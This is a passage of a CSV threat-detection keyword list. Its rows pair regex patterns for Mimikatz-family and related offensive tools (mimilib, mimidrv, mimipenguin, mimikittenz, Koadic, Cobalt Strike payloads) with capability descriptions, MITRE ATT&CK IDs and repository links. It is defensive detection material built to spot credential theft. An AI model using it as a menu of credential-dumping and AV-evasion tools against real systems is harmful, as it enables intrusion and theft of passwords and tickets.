TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Mimi-Command privilege::*",".{0,1000}Mimi\-Command\sprivilege\:\:.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*mimidogz-master.zip*",".{0,1000}mimidogz\-master\.zip.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*mimidrv (mimikatz)*",".{0,1000}mimidrv\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv*",".{0,1000}mimidrv.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.pdb*",".{0,1000}mimidrv\.pdb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.sys*",".{0,1000}mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimidrv.zip*",".{0,1000}mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz -Command *",".{0,1000}mimikatz\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*mimikatz for Windows*",".{0,1000}mimikatz\sfor\sWindows.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimikatz*",".{0,1000}Mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimikatz.cs*",".{0,1000}Mimikatz\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz.exe*",".{0,1000}mimikatz\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*mimikatz.log*",".{0,1000}mimikatz\.log.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*mimikatz.py*",".{0,1000}mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mimikatz.raw*",".{0,1000}mimikatz\.raw.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*mimikatz_cred_collector.py*",".{0,1000}mimikatz_cred_collector\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*mimikatz_dotnet2js*",".{0,1000}mimikatz_dotnet2js.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_dynwrapx*",".{0,1000}mimikatz_dynwrapx.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_tashlib*",".{0,1000}mimikatz_tashlib.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*mimikatz_trunk*",".{0,1000}mimikatz_trunk.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimikatz_x64.exe*",".{0,1000}mimikatz_x64\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mimikatz_x86.exe*",".{0,1000}mimikatz_x86\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MimikatzByPowerShellForDomain.py*",".{0,1000}MimikatzByPowerShellForDomain\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*MimikatzOnLocal.py*",".{0,1000}MimikatzOnLocal\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*mimikittenz*",".{0,1000}mimikittenz.{0,1000}","offensive_tool_keyword","mimikittenz","mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff","T1003 - T1216 - T1552 - T1002 - T1083","TA0003 - TA0008 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/orlyjamie/mimikittenz","1","1","N/A","10","10","1814","333","2020-10-16T01:20:30Z","2016-07-04T13:57:18Z" "*mimilib (mimikatz)*",".{0,1000}mimilib\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib for Windows (mimikatz)*",".{0,1000}mimilib\sfor\sWindows\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib*",".{0,1000}mimilib.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.dll*",".{0,1000}mimilib\.dll.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilib.py*",".{0,1000}mimilib\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*mimilove*",".{0,1000}mimilove.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilove.exe*",".{0,1000}mimilove\.exe.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation ","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimilove.vcxproj*",".{0,1000}mimilove\.vcxproj.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimipenguin*",".{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.","T1555 - T1003 - T1212 - T1558","TA0001 - TA0003","N/A","N/A","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","N/A","N/A","10","3680","631","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z" "*mimipenguin.*",".{0,1000}mimipenguin\..{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipenguin.cna*",".{0,1000}mimipenguin\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*mimipenguin.git*",".{0,1000}mimipenguin\.git.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" 